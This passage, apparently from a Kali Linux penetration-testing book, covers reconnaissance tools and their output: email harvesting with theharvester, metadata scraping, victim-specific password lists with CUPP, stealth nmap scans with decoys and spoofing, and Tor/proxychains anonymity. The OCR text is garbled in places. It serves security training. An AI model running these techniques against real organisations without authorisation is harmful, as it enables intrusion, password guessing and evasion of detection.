Kali includes several tools developed to take advantage of IPv6 (most comprehensive 
scanners, such as nmap, now support IPv6), some of which are as follows; tools that 
are particular to IPv6 were largely derived from the THC-IPv6 Attack Toolkit. 



Application Description 

dnsdict6 Enumerates subdomains to obtain IPv4 and IPv6 addresses (if present) 

using a brute force search based on a supplied dictionary file or its own 
internal list. 

dnsrevenum6 Performs reverse DNS enumeration given an IPv6 address. 
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The execution of the dnsdict6 command is shown in the following screenshot: 

rootQkali: # dnsdictd google.com 

Starting DNS enumeration work on google.com. ... 

Starting enumerating google.com. - creating 8 threads for 798 words... 

Estimated time to completion: 1 to 2 minutes 

www.google.com. => 2607 : f8b0 :400b :8Q7 :: 1012 

ipv6.google.com. => 2607 : f8b0 :400b :80b :: 1012 

mail.google.com. => 2607 : f8b0 :400b :806 :: 1016 

blog.google.com. => 2607 : f8b0 :4001 :cOO : :bf 



Mapping the route to the target 

Route mapping was originally used as a diagnostic tool that allows you to view 
the route that an IP packet follows from one host to the next. Using the time to live 
(TTL) field in an IP packet, each hop from one point to the next elicits an ICMP 
TIME_EXCEEDED message from the receiving router, decrementing the value in 
the TTL field by 1. The packets count the number of hops and the route taken. 

From an attacker's, or penetration tester's perspective, the traceroute data yields 
the following important data: 

• The exact path between the attacker and the target 

• Hints pertaining to the network's external topology 

• Identification of accessing control devices (firewalls and 
packet-filtering routers) that may be filtering attack traffic 

• If the network is misconfigured, it may be possible to identify 
internal addressing 




Using a web-based traceroute (www . traceroute . org), it is 
possible to trace various geographic origin sites to the target network. 
These types of scans will frequently identify more than one different 
network connecting to the target, which is information that could be 
missed by conducting only a single traceroute from a location close 
to the target. Web-based traceroute may also identify multihomed 
hosts which connect two or more networks together. These hosts are 
an important target for attackers, because they drastically increase the 
attack surface leading to the target. 
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In Kali, traceroute is a command-line program that uses ICMP packets to map the 
route; in Windows, the program is tracert. 

If you launch traceroute from Kali, it is likely that you will see most hops filtered 
(data is shown as * * *). For example, traceroute from the author's present location 
to www . google . com would yield the following: 

root@kali: # traceroute www.google.com 

traceroute to www.google.com (24.226.16.35), 30 hops max, 60 byte packets 

1 192.168.117.2 (192.168.117.2) 6.179 ms 6.167 ms 6.699 ms 

2 3 (t # # 

^ 3+E 3(t 



However, if the same request was run using tracert from the Windows command 
line, we would see the following: 



C:\>tracert 24.226.16.35 



Tracing route to cache.googleuideo.com [24.226.16.35] 
Duer a naximun of 30 hops: 



1 


1 


ns 


<1 


ns 


<1 


ns 


192.168.1.1 


2 

141] 


13 


ns 


7 


ns 


1 


ns 


s72-38-69-141 .static .conn.cgocable .net 172 .38 


3 


21 


ns 


31 


ns 


29 


ns 


10.64.232.1 


4 


164 


ns 


159 


ns 


210 


ns 


d2 26-8-197. ho ne.cgocab le.net [24.226.8.197] 


5 


95 


ns 


98 


ns 


95 


ns 


c go uau e -bus y3-ubr. ego cable .net [24.226.6.133] 


6 


12 


ns 


12 


ns 


14 


ns 


cache .google video .con [24.226.16.35] 



Trace complete. 



Not only do we get the complete path, but we can also see that www . google . com is 
resolving to a slightly different IP address, indicating that load balancers are in effect 
(you can confirm this using Kali's lbd script; however, this activity may be logged by 
the target site). 

The reason for the different path data is that, by default, traceroute used UDP 
datagrams while Windows tracert uses ICMP echo request (ICMP type 8). 
Therefore, when completing a traceroute using Kali tools, it is important to use 
multiple protocols in order to obtain the most complete path, and to bypass packet- 
filtering devices. 
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Kali provides the following tools for completing route traces: 



Application Description 

hping3 This is a TCP/IP packet assembler and analyzer. This supports TCP, 

UDP, ICMP, and raw-IP and uses a ping-like interface. 

in trace This enables users to enumerate IP hops by exploiting existing TCP 

connections, both initiated from the local system or network, or from 
local hosts. This makes it very useful for bypassing external filters 
such as firewalls, intrace is a replacement for the less reliable Otrace 
program. 

trace 6 This is a trace route program that uses ICMP6. 



hping3 is one of the most useful tools due to the control it gives over packet type, 
source packet, and destination packet. For example, Google does not allow ping 
requests. However, it is possible to ping the server if you send the packet as a TCP 
SYN request. 

In the following example, the tester attempts to ping Google from the command line. 
The returned data identifies that www . google . com is an unknown host; Google is 
clearly blocking ICMP-based ping commands. However, the next command invokes 
hping3, instructing it to do the following: 

1. Send a ping-like command to Google using TCP with the SYN flag set (-s). 

2. Direct the packet to port 80; legitimate requests of this type are rarely 
blocked (- p so). 

3. Set a count of sending three packets to the target ( - c 3). 
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root@kali: # ping www.google.com 

ping: unknown host www.google.com 

root@kali: # hping3 -S www.google.com -p 80 -c 3 

HPING www.google.com (ethO 74.125.225.112): S set, 4G headers + G data bytes 
len=46 ip=74 . 125 . 225 . 1 12 ttl=56 id=10463 sport=8G flags=SA seq=G win=429GG rtt=2 
81.G ms 

len=46 ip=74 . 125 . 225 . 1 12 ttl=56 id=44734 sport=8G flags=SA seq=l win=429GG rtt=8 
4.0 ms 

len=46 ip=74 . 125 . 225 . 1 12 ttl=56 id=26344 sport=80 flags=SA seq=2 win=429G0 rtt=2 
6.3 ms 

— www.google.com hping statistic — 

3 packets transmitted, 3 packets received, 0% packet loss 
round-trip min/avg/max = 26 .3/130 .5/281 .G ms 

root@kali: # _ 



The hping 3 command successfully identifies that the target is online, and provides 
some basic routing information. 

Obtaining user information 

Many penetration testers gather user names and e-mail addresses, as this 
information is frequently used to log on to targeted systems. 

The most commonly employed tool is the web browser, which is used to manually 
search the target organization's website as well as third-party sites such as Linkedln 
or Jigsaw. 

Some automated tools included with Kali can supplement the manual searches. 




E-mail addresses of former employees can still be of use. When 
conducting social engineering attacks, directing information requests to 
a former employee usually results in a redirect that gives the attacker 
the "credibility" of having dealt with the previous employee. In addition, 
many organizations do not properly terminate employee accounts, and it 
is possible that these credentials may still give access to the target system. 
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Gathering names and e-mail addresses 

The theharvester tool is a Python script that searches through popular search 
engines and other sites for e-mail addresses, hosts, and subdomains. 

Using theharvester is relatively simple as there are only a few command 
switches to set. The options available are: 

• -d: This identifies the domain to be searched; usually the domain or 
target's website. 

• - b: This identifies the source for extracting the data; it must be one of 
the following: 

Bing, BingAPI, Google, Google-Profiles, Jigsaw, Linkedln, Peoplel23, PGP, 
or All 

• - 1: This limit option instructs theharvester to only harvest data from a 
specified number of returned search results. 

• - f : This option is used to save the final results to an HTML and an XML file. 
If this option is omitted, the results will be displayed on the screen and 

not saved. 



The following screenshot shows the results of a simple search of the Google indexes 
for the domain digitaldef ence . ca: 

root@kali:~# theharvester -d digitaldefence .ca -b google 
******************************************************************* 



* I LI l_ A /\ | | * 

* | _| '_ \ / _ \ //_//_' \ '_\ \ / / _ V _| _/ _ \ '_| * 

* I LI I I I / / / (_l I I \ V / _/\_ \ 1 1 / I 

* \_LI l_l\ I \/ /_/ \_._LI \_/\ II A \ LI 

* * 

* TheHarvester Ver. 2.2a * 

* Coded by Christian Martorella * 

* Edge -Security Research * 

* cmartorella@edge-security .com * 

******************************************************************* 



[-] Searching in Google: 

Searching 0 results... 
Searching 100 results... 

[+] Emails found: 



robert .beggs@digitaldefence .ca 
careers@digitaldefence .ca 
csirt@digitaldefence.ca 
partners@digitaldefence .ca 
info@digitaldefence.ca 

[+] Hosts found in search engines: 



54.236 . 190 .114 :www . digitaldefence .ca 
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Gathering document metadata 

Document metadata refers to the information that is appended to documents so that 
applications can manage them during the creation and storage processes. Examples 
of metadata typically attached to documents include the following: 

• The company or person who owns the application used to create 
the document 

• The name of the document's author 

• The time and date that the document was created 

• The date when the file was last printed or modified; in some cases, 
it will identify who made the modifications 

• The location on the computer network where the document was created 

• Some files, especially those created by cameras or mobile devices, may 
include geographic tags that identify where the image was created 

Metadata is not immediately visible to the end user, so most documents are 
published with the metadata intact. Unfortunately, this data leakage can reveal 
information that can be used by a tester or attacker to facilitate an attack. At a 
minimum, testers and attackers can harvest user names by comparing them to data 
in documents; they can identify persons associated with particular data types, such 
as annual financial reports or strategic planning. 

As mobile devices become more common, the risks associated with geographical 
metadata have increased. Attackers look for locations (cottages, hotels, and 
restaurants that are frequently visited) as sites that may allow them to launch attacks 
against users who have let their guard down outside the corporate perimeter. For 
example, if an employee of the target organization regularly posts pictures to a 
social media website while waiting for a commuter train, an attacker may target that 
employee for a physical attack (theft of the mobile device), wireless attack, or even 
peek over the victim's shoulder to note the username and password. 
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On Kali, the tool Metagoof il performs a Google search to identify and download 
a target website's documents (doc, docx, pdf, pptx, xls, and xlsx) and extract 
usernames, a software version, path storage names, and a server, or workstation 
names, as shown in the following screenshot: 



root@kali: # metagoofil -d microsoft.com -t doc -1 25 -o microsoft -f microsoft. 
html 

* AA | | / _i_) | * 

/ \ / _ \ _/ _' \/ _' | / _ \ / _ \ | |_| | | * 

* / AA \ / 11 t_| | (_| I CJ | CJ | .III* 

* w \/\ |\_\_,_|\_, |\ / \ / 1_| LL| 5(1 

:+: | / * 

:+: Metagoofil Ver 2.2 * 

* Christian Martorella * 

:+: Edge-Sscurity.com * 

:+: cmartorella_at_edge-security .com * 

[ 1 doc 1 ] 

[-] Starting online search... 

[-] Searching for doc files, with a limit of 25 
Searching 100 results... 

Results: 102 files found 
Starting to download 50 of them: 



[1/50] /webhp?hl=en 

[x] Error downloading /webhp?hl=en 

[2/50] http ://download .mic rosoft .eom/documents/customerevidence/9930_Planet_Pret 
Frees Sandwich Chain fr.doc 



Metagoofil downloads the specified number of documents to a temporary folder, 
and extracts and organizes the relevant metadata. It also performs this function 
against files that have previously been downloaded and are now stored locally. 

One of the first returns of Metagoofil is a list of the users that are found. 

The following is a screenshot of a truncated list: 

[+] List of users found: 



Michael Grimm, Microsoft Corp. 

IT Pro Marketing 

May Yee 

sarah condon 

Michael Royster 
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Metagoof il also identifies servers and pathnames of the documents. If certain 
documents of interest are localized with a particular user (for example, drafts of 
financial reports found on an administrative assistant's workstation), that system 
can be targeted later during testing, as shown in the following screenshot: 

[+] List of paths and servers found: 



No rmal 

documentbase 

i i 

ASML.dot 
CEP_Template 
CEP_Template .dot 
Normal .dot 

'C:\Mis documentos\Articulo Gestion.doc 1 

'C:\WINDOWS\TEMP\AutoRecovery_save of Articulo Gestion.asd 1 



Profiling users for password lists 

So far, you have learned to use passive reconnaissance to collect names and 
biographical information for users of the target being tested; this is the same process 
used by hackers. The next step is to use this information to create password lists 
specific to the users and the target. 

Lists of commonly used passwords are available for download, and are stored locally 
on Kali in the /usr/share/wordlists directory. These lists reflect the choices of a 
large population of users, and it can be time consuming for an application to attempt 
to use each possible password before moving on to the next password in the queue. 

Fortunately, Common User Password Profiler (CUPP) allows the tester to generate 
a wordlist that is specific to a particular user. CUPP was present on Backtrack 5r3; 
however, it will have to be downloaded for use on Kali. To obtain CUPP, enter the 
following command: 

git clone https://github.com/Mebus/cupp.git 

This will download CUPP to the local directory. 

CUPP is a Python script, and can be simply invoked from the CUPP directory by 
entering the following command: 

root@kali:~# python cupp.py -i 
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This will launch CUPP in the interactive mode, which prompts the user for specific 
elements of information to use in creating wordlist. An example is shown in the 
following screenshot: 

root@kali:~/Desktop/cu|>|i# python cupp.py -i 

[+] Insert the informations about the victim to make a dictionary 
[+] If you don't know all the info, just hit enter when asked! ;) 

> Name : Robb 

> Surname: Beggs 

> Nickname: rwbeggs 

> Birthdate (DDMMYYYY): 01G1190G 



> Wife ' s[husband 1 s) name: Vixen 

> Wife 1 s(husband 1 s) nickname: Vix 

> Wife's(husband's) birthdate (DDMMYYYY): G2G219G2 



> Child's name: Demon 

> Child's nickname: Demon 

> Child's birthdate (DDMMYYYY): G3G3192G 



> Pet ' s name : Spot 

> Company name: Packt 



> Do you want to add some key words about the victim? Y/[N] : 

> Do you want to add special chars at the end of words? Y/[N] : 

> Do you want to add some random numbers at the end of words? Y/[N] 

> Leet mode? (i.e. leet = 1337) Y/[N] : 

[+] Now making a dictiona ry . . . 

[+] Sorting list and removing duplicates... 

[+] Saving dictionary to robb.txt, counting 1157 words. 

[+] Now load your pistolero with robb.txt and shoot! Good luck! 



When the interactive mode has completed creating wordlist, it is placed in the 
CUPP directory. 
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Summary 

The first real step in the attack process or kill chain is to conduct reconnaissance to 
identify the target and potential attack routes. Passive reconnaissance assesses data 
that is publicly available. This is a stealthy assessment — the IP address or activities 
of the attacker are almost indistinguishable from normal access. Nevertheless, this 
information can be critical when conducting social engineering attacks, or facilitating 
other attack types. 

In the next chapter, we will assess the types of reconnaissance that are more active. 
Although these techniques produce more information, there is an increased risk of 
detection. Therefore, the emphasis will be on advanced stealth techniques. 
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Active Reconnaissance and 
Vulnerability Scanning 



The objective of the reconnaissance phase is to gather as much information about the 
target as possible in order to facilitate the exploitation phase of the kill chain. 

We have seen how passive reconnaissance, which is almost undetectable, can yield 
a significant amount of information about the target organization and its users. 

Active reconnaissance builds on the results of open-source intelligence and passive 
reconnaissance, and focuses on using probes to identify the path to the target and 
the exposed attack surface of the target. In general, complex systems have a greater 
attack surface, and each surface may be exploited and then leveraged to support 
additional attacks. 

Although active reconnaissance produces more information, and more useful 
information, interactions with the target system may be logged, triggering alarms 
by protective devices, such as firewalls and intrusion detection systems. As the 
usefulness of the data to the attacker increases, so does the risk of detection; this 
is shown in the following diagram: 




Infrastructure, 
host detection 
port scans 

^OSINT, passive 
reconnaissance 



Operating system, 
services, 
application, 
patch-level detection 



Interaction with target, 
chance of detection — 



Active Reconnaissance and Vulnerability Scanning 

To improve the effectiveness of active reconnaissance in providing detailed 
information, our focus will be on using stealthy, or difficult to detect, techniques. 

In this chapter, you will learn: 

• Stealth scanning strategies 

• Network infrastructure, host discovery, and enumeration 

• Comprehensive reconnaissance applications, especially recon- ng 

• Targeted vulnerability scanning 

Stealth scanning strategies 

The greatest risk of active reconnaissance is the discovery by the target. Using the 
tester's time and data stamps, the source IP address, and additional information, 
the target can identify the source of the incoming reconnaissance. Therefore, stealth 
techniques are employed to minimize the chances of detection. 

When employing stealth to support reconnaissance, a tester mimicking the actions of 
a hacker will do the following: 

• Camouflage tool signatures to avoid detection and triggering an alarm 

• Hide the attack within legitimate traffic 

• Modify the attack to hide the source and type of traffic 

• Make the attack invisible using nonstandard traffic types or encryption 

Stealth scanning techniques can include some or all of the following: 

• Adjusting source IP stack and tool identification settings 

• Modifying packet parameters (nmap) 

• Using proxies with anonymity networks (Proxy Chains and Tor network) 

Adjusting source IP stack and tool 
identification settings 

Before the penetration tester (or the attacker) begins testing, it must ensure that all 
unnecessary services on Kali are disabled or turned off. 
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For example, if the local DHCP daemon is enabled and is not required, it is possible 
for the DHCP to interact with the target system, which could be logged and send 
alarms to the target's administrators. 

Most testers also disable IPv6 from running on the testing system. This will stop IPv6 
from announcing your presence on the target network and ensure that all traffic is 
first routed through an IPv4 socks proxy. Disabling IPv6 can be accomplished by 
editing the /etc/sysctl . conf file to include the following lines: 

#disable ipv6 

net . ipv6 . conf . all . disable_ipv6 = 1 
net . ipv6 . conf . default . disable_ipv6 = 1 
net . ipv6 . conf . lo . disable = 1 

Some commercial and open source tools (for example, the Metasploit Framework) 
tag their packets with an identifying sequence. Although this can be useful in 
post-test analysis of a system's event logs (where events initiated by a particular 
testing tool can be directly compared to a system's event logs to determine how the 
network detected and responded to the attack), it can also trigger certain intrusion 
detection systems. Test your tools against a lab system to determine the packets that 
are tagged, and either change the tag, or use the tool with caution. 

The easiest way to identify tagging is to apply the tool against a newly-created 
virtual image as the target, and review system logs for the tool's name. In addition, 
use Wireshark to capture traffic between the attacker and target virtual machines, 
and then search the packet capture (pcap) files for the any keywords that can be 
attributed to the testing tool (name of the tool, vendor, license number, and so on). 

The UserAgent in the Metasploit Framework can be changed by modifying the 
http_f orm_f ield option. From the msfconsole prompt, select the option to use 
auxiliary/fuzzers/http/http_f orm_f ield, and then set a new useragent, as 
shown in the following screenshot: 

msf > use auxiliary/fuzzers/http/http_form_field 

msf auxiliary (http_form_f ield] > set UserAgent 

UserAgent => Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1] 

msf auxiliary (http_form_f ield) > set UserAgent Googlebot/2 . 1 (+http ://www. google 

.com/bot .html) 

UserAgent => Googlebot/2. 1 (+http ://www. google .com/bot .html) 
msf auxiliary ( http form fiel d) > _ 

In this example, UserAgent was set to be Google's indexing spider, the Googlebot. 
This is a common automated application that visits and indexes websites, and rarely 
attracts attention by the website's owner. 

To identify legitimate Use r Agents, refer to the examples at 1 

www.useragentstring.com. I 
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Modifying packet parameters 

The most common approach to active reconnaissance is to conduct a scan against the 
target— send defined packets to the target, and then use the returned packets to gain 
information. The most popular tool of this type is Network Mapper (nmap). 

To use nmap effectively, it must be run with root-level privileges. This is typical of 
applications that manipulate packets, which is why Kali defaults to root at the time 
of startup. 

When attempting to minimize detection, some stealth techniques to avoid detection 
and subsequent alarms include the following: 

• Identify the goal of the scan before testing and send the minimum number 
of packets needed to determine the objective. For example, if you wish to 
confirm the presence of a web host, you first need to determine if port 8 0 , 
the default port for web-based services, is open. 

• Avoid scans that may connect with the target system and leak data. Do not 
ping the target or use synchronize (SYN) and nonconventional packet scans, 
such as acknowledge (ACK), finished (FIN), and reset (RST) packets. 

• Randomize or spoof packet settings, such as the source IP and port address, 
and the MAC address. 

• Adjust the timing to slow the arrival of packets at the target site. 

• Change the packet size by fragmenting packets or appending random data to 
confuse packet inspection devices. 

For example, if you want to conduct a stealthy scan and minimize detection, the 
following nmap command could be used: 

#nmap --spoof -mac- Cisco - -data-length 24 -T paranoid -max-hostgroup 
1 - max-parallelism 10 -PN -f -D 10 . 1 . 2 0 . 5 , RND : 5 , ME - - v -n -sS 
-sV-oA /desktop/pentest/nmap/out -p T: 1-1024 
-random-hosts 10.1.1.10 10.1.1.15 

The following table explains the previous command in detail: 



Command 


Rationale 


- -spoof -mac -Cisco 


Spoofs the MAC address to match a Cisco product. 
Replacing Cisco with 0 will create a completely 
random MAC address. 


--data-length 24 


Appends twenty-four random bytes to most packets 
that are sent. 


-T paranoid 


Sets the time to the slowest setting— paranoid. 
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Command 


Rationale 


-- max-hostgroup 


Limits the hosts that are scanned at a time. 


-- max-parallelism 


Limits the number of outstanding probes that are 
sent out. You can also use the - - scan- delay 
option to set a pause between the probes; however, 
this option is not compatible with the - -max_ 
parallelism option. 


-PN 


Does not ping to identify active systems 
(this can leak data). 


-f 


Fragments the packets; this will frequently fool 
low-end and improperly configured IDs. 


-D 10.1.20.5, RND : 5 , ME 


Creates decoy scans to run simultaneously with the 
attacker's scans; hides the actual attack. 


-n 


No DNS resolution; internal or external DNS 
servers are not actively queried by nmap for DNS 
information. Such queries are frequently logged, so 
the query function should be disabled. 


- sS 


Conducts a stealth TCP SYN scan, which does not 
complete the TCP handshake. Other scan types 
(for example. Null scans) can also be used; however, 
most of these will trigger detection devices. 


-sV 


Enables version detection. 


-oA /desktop/pentest/nmap 


Outputs the results to all formats (normal, greppable, 
and XML). 


-p T : 1 - 1024 


Specifies the TCP ports to be scanned. 


-- random-hosts 


Randomizes the target host order. 



Together, these options will create a very slow scan that hides the true identity of 
the source. However, if the packets are too unusual, complex modification may 
actually attract the attention of the target; therefore, many testers and attackers use 
anonymity networks to minimize detection. 

Using proxies with anonymity networks 
(Tor and Privoxy) 

Tor (www . torpro j ect . org) is an open source implementation of the third 
generation onion routing that provides free access to an anonymous proxy network. 
Onion routing enables online anonymity by encrypting user traffic and then 
transmitting it through a series of onion routers. At each router, a layer of encryption 
is removed to obtain routing information, and the message is then transmitted to the 
next node. It has been likened to the process of gradually peeling an onion, hence 
the name. It protects against traffic analysis attacks by guarding the source and 
destination of a user's IP traffic. 
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In this example. Tor will be used with Privoxy, a noncaching web proxy that sits in 
the middle of an application that communicates with the Internet, and uses advanced 
filtering to ensure privacy and remove ads and potentially hostile data being sent to 
the tester. 

To install Tor, perform the following steps: 

1. Issue the apt-get update and apt-get upgrade commands, and then use 
the following command: 

apt-get install tor 

2. Once Tor is installed, edit the Proxychains . conf file located in the 
/etc directory. 

This file dictates the number and order of proxies that the test system will 
use on the way to the Tor network, proxy servers may be down, or they 
may be experiencing a heavy load (causing slow or latent connections); if 
this occurs, a defined or strict proxychain will fail because an expected link 
is missing. Therefore, disable the use of strict_chains and enable 
dynamic chains, which ensures that the connection will be routed, as 
shown in the following screenshot: 

1 |# proxychains . conf VER 3.1 
2 # 

3# HTTP, S0CKS4, S0CKS5 tunneling proxifier with DNS. 

4 

5 

6 # The option below identifies how the ProxyList is treated. 

7# only one option should be uncommented at time, 

8# otherwise the last appearing option will be accepted 
9# 

10 dynamic_chain 

11 # 

12# Dynamic - Each connection will be done via chained proxies 
13# all proxies chained in the order as they appear in the list 
14# at least one proxy must be online to play in chain 
15# (dead proxies are skipped) 

16# otherwise EINTR is returned to the app 
17# 

18 #st rict_chain 
19# 

20# Strict - Each connection will be done via chained proxies 
21# all proxies chained in the order as they appear in the list 
22# all proxies must be online to play in chain 
23# otherwise EINTR is returned to the app 
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3. Next, edit the [ProxyList] section to ensure that the socks5 proxy is 
present, as shown in the following screenshot: 

6£ [ProxyList] 
i # add proxy here . . . 

62 # meanwile 

61- # defaults set to "tor" 

54 socks4 127.0.0.1 9050 
65 socks5 127.0.0.1 9050 

Open proxies can be easily found online and added to the proxychains 
file. Testers can take advantage of this to further obfuscate their identity. 
For example, if there are reports that a certain country or block of IP 
addresses has been responsible for recent online attacks, look for open 
proxies from that location and add them to your list, or a separate 
configuration file. 

4. To start the Tor service from a terminal window, enter the 
following command: 

root@kali:~# service tor start 

5. Verify that Tor has started by using the following command: 
root@kali:~# service tor status 

6. It is important to verify that the Tor network is working and providing 
anonymous connectivity. Verify your source IP address first. From a 
terminal, enter the following command: 

root@kali:~# iceweasel www.whatismyip.com 

This will start the Iceweasel browser and open it to a site that provides the 
source IP address connected with that web page. Note the IP address, and 
then invoke Tor routing using the following proxychains command: 

root@kali:~# proxychainsiceweasel www.whatismyip.com 
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In this particular instance, the IP address was identified as 96.47.226.60. A who is 
lookup of that IP address from a terminal window indicates that the transmission is 
now exiting from a Tor exit node, as shown in the following screenshot: 



Net Range : 
CIDR: 
OriginAS : 
Net Name : 
NetHandle : 
Parent : 

Net Type : 
Comment : 
Comment : 
Comment : 
Comment : 
Comment : 
Comment : 



96.47.226.16 - 96.47.226.23 
96.47.226.16/29 

T0R-MIA01 

NET-96-47-226-16-1 

NET-96-47-224-0-1 

RealTocated 



This is a Tor Exit Node operated on behalf of the Tor 
Project. Tor helps you defend against network 
surveillance that threatens personal freedom and 
privacy. You can learn more now at www.torproject.org 



You can also verify that Tor is functioning properly by accessing 

https : / / check . torpro j ect . org. 

Although communications are now protected using the Tor network, it is possible for 
a DNS leak, which occurs when your system makes a DNS request to provide your 
identity to an ISP. You can check for DNS leaks at www . dnsleaktest . com. 

When you test for a DNS leak. Kali's configuration of proxychains responds with a 
default source IP address of a Level 3 Communications server located in the United 
States, as shown in the following screenshot. This provides additional protection for 
the tester's identity. 

Your DNS test results 

This page shows the DNS servers that your computer is using to resolve DNS names. The owners of the servers listed below have the ability to 
log the names of all websites you connect to. 

WARNING: If you are connected to a VPN service and ANY of the servers listed below are not provided by the VPN service then your DNS maybe 
leaking. (You should be able to recognise them based on the hostname, ISP and location). This is not an issue if you trust the owners of these 
servers with your private data. 

We detected the 2 DNS servers listed below. 



IP: 


192.221.144.192 


Hostname: 


192.221.144.192 


ISP: 


Level 3 Communications 


Country: 


United States 



IP: 


192.221.144.109 


Hostname: 


192.221.144.109 


ISP: 


Level 3 Communications 


Country: 


United States 
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Most command lines can be run from the console using proxychains to access the 
Tor network. 

When using Tor, some considerations to be kept in mind are as follows: 

• Tor provides an anonymizing service, but it does not guarantee privacy. 
Owners of the exit nodes are able to sniff traffic, and reportedly may be able 
to access user credentials. 

• Vulnerabilities in the Tor Browser Bundle have reportedly been used by law 
enforcement to exploit systems and gain user information. 

• ProxyChains does not handle UDP traffic. 

• Some applications and services cannot run over this environment — in 
particular, Metasploit and nmap may break. The stealth SYN scan of nmap 
breaks out of proxychains and the connect scan is invoked instead; this can 
leak information to the target. 

• Some browser applications (ActiveX, Adobe's PDF applications. Flash, Java, 
RealPlay, and QuickTime) can be used to obtain your IP address. 

• Ensure that you clear and block cookies before browsing. 

The Tor-Buddy script allows you to control how frequently the Tor IP 
address is refreshed, automatically making it more difficult to identify 
the user's information (http:/ / sourceforge.net/ projects/ linuxscripts/ 
files / T or-Buddy / ) . 



Identifying the network infrastructure 

Once the tester's identity is protected, identifying the devices on the Internet- 
accessible portion of the network is the next critical first step in scanning a network. 

Attackers and penetration testers use this information to do the following: 

• Identify devices that may confuse (load balancers) or eliminate 
(firewalls and packet inspection devices) test results 

• Identify devices with known vulnerabilities 

• Identify the requirement for continuing to implement stealthy scans 

• Gain an understanding of the target's focus on secure architecture and 
on security in general 
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traceroute provides basic information on packet filtering abilities; some other 
applications on Kali include the following: 



Application Description 

lbd Uses two DNS- and HTTP-based techniques to detect load balancers 

(shown in the following screenshot) 

miranda.py Identifies universal plug-and-play and UPNP devices 



nmap Detects devices and determines the operating systems and their version 

SHOD AN Web-based search engine that identifies devices connected to 

the Internet, including those with default passwords, known 
misconfigurations, and vulnerabilities 



The following screenshot shows the results obtained on running the lbd script 
against Google; as you can see, Google uses both DNS-Loadbalancing as well 
as http -L oadbalancing on its site. From a penetration tester's perspective, this 
information could be used to explain why spurious results are obtained, as the load 
balancer shifts a particular tool's activity from one server to another. 

Checking for DNS-Loadbalancing: FOUND 
www.google.ca has address 173.194.43.87 
www.google.ca has address 173.194.43.88 
www.google.ca has address 173.194.43.95 

Checking for HTTP -Loadbalancing [Server] : 

GFE/2.0 

gws 

FOUND 



Checking 


for 


HTTP -Loadbalancing | 


[Date] : 


15 


48 


26, 


15 


48 


27, 


15 


48 


27, 


15 


48 


27 


15 


48 


28, 


15 


48 


28, 


15 


48 


29, 


15 


48 


29, 


15 


48 


29, 


15 


48 


30, 


15 


48 
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15 
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31 


15 


48 


31, 


15 


48 


31, 


15 


48 


32, 


15 


48 


32, 


15 


48 


32, 
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48 
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15 


48 
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48 


33 


15 
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15 


48 
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48 
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36, 
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48 
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15 
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15 
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NOT FOUND 









Checking for HTTP -Loadbalancing [Diff] : FOUND 

> Location: http ://www. google .ca/?gfe_rd=ct rl&ei=4YEgU7LoBaGC8Qfq44G4Dg&gws_rd=c 
r 

< Location : http ://www. google .ca/?gfe_rd=c r&ei=4IEgU9mrK8zY8geTHGgDw 

< Content -Length: 258 

< Server: GFE/2.0 

> P3P: CP="This is not a P3P policy! See http://www.google.com/support/accounts/ 
bin/answer .py?hl=en&answe r=l 5 1657 for more info." 

> Server: gws 

> Content -Length: 274 

> X-XSS-Protection: 1; mode=block 

> X -Frame -Options : SAMEORIGIN 

www.google.ca does Load -balancing . Found via Methods: DNS HTTP[Server] HTTP[Diff 
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Enumerating hosts 

Host enumeration is the process of gaining specific particulars regarding a defined 
host. It is not enough to know that a server or wireless access point is present; 
instead, we need to expand the attack surface by identifying open ports, the base 
operating system, services that are running, and supporting applications. 

This is highly intrusive and unless care is taken, the active reconnaissance will be 
detected and logged by the target organization. 

Live host discovery 

The first step is to run network ping sweeps against a target address space and look 
for responses that indicate that a particular target is live and capable of responding. 
Historically, pinging referred to the use of ICMP; however, TCP, UDP, ICMP, and 
ARP traffic can also be used to identify live hosts. 

Various scanners can be run from remote locations across the Internet to identify live 
hosts. Although the primary scanner is nmap. Kali provides several other applications 
that are also useful, as shown in the following table: 



Application 


Description 


alive6 and detect-new- ip6 


IPv6 host detection, detect -new- ip 6 runs on a 
scripted basis and identifies new IPv6 devices when 
added. 


dnmap and nmap 


nmap is the standard network enumeration tool, 
dnmap is a distributed client-server implementation 
of the nmap scanner. 




PBNJ stores nmap results in a database, and then 
conducts historical analyses to identify new hosts. 


fping, hping2, hping3, and 
nping 


Packet crafters that respond to targets in various 
ways to identify live hosts 



To the penetration tester or attacker, the data returned from live host discovery will 
identify the targets for attack. 
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Run multiple host discovery scans while conducting a penetration test. 
Certain devices may be time dependent. During one penetration test, 
it was discovered that the system administrator set up a game server 
after regular business hours. Because it was not an approved business 
system, the administrator did not follow the normal process for securing 
the server; multiple vulnerable services were present, and it had not 
received necessary security patches. Testers were able to compromise the 
game server and gain access to the underlying corporate network using 
vulnerabilities in the administrator's game server. 



Port, operating system, and service 
discovery 

Kali provides several different tools useful for identifying open ports, operating 
systems, and installed services on remote hosts. The majority of these functions 
can be completed using nmap. Although we will focus on examples using nmap, 
the underlying principles apply to the other tools as well. 

Port scanning 

Port scanning is the process of connecting to TCP and UDP ports to determine what 
services and applications are running on the target device. There are 65,535 ports 
each for both TCP and UDP on each system. Some ports are known to be associated 
with particular services (TCP 20 and 21 are the usual ports for the file transfer 
protocol service (FTP)). The first 1,024 are the well-known ports, and most defined 
services run over ports in this range; accepted services and ports are maintained 
by IANA (http : / /www . iana . org/ assignments/ service-names-port-numbers/ 
service-names-port-numbers . xhtml). 

Although there are accepted ports for particular services, such as port 
80 for web-based traffic, services can be directed to use any port. This 
option is frequently used to hide particular services, particularly if 
the service is known to be vulnerable to attack. However, if attackers 
complete a port scan and do not find an expected service, or find it 
using an unusual port, they will be prompted to investigate further. 

The universal port mapping tool, nmap, relies on active stack fingerprinting. 
Specially crafted packets are sent to the target system, and the response of the OS 
to those packets allows nmap to identify the OS. In order for nmap to work, at least 
one listening port must be open, and the operating system must be known and 
fingerprinted, with a copy of that fingerprint in the local database. 
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Using nmap for port discovery is very noisy — it will be detected and logged by 
network security devices. Some points to remember are as follows: 

• Attackers and penetration testers focused on stealth will test only the ports 
that impact the kill chain they are following to their specific target. If they 
are launching an attack that exploits vulnerabilities in a web server, they will 
search for targets with port 8 o or port 8 0 8 0 accessible. 

• Most port scanners have default lists of ports that are scanned — ensure that 
you know what is on that list and what has been omitted. Consider both TCP 
and UDP ports. 

• Successful scanning requires a deep knowledge of TCP/IP and related 
protocols, networking, and how particular tools work. For example, SCTP 
is an increasingly common protocol on networks, but it is rarely tested on 
corporate networks. 

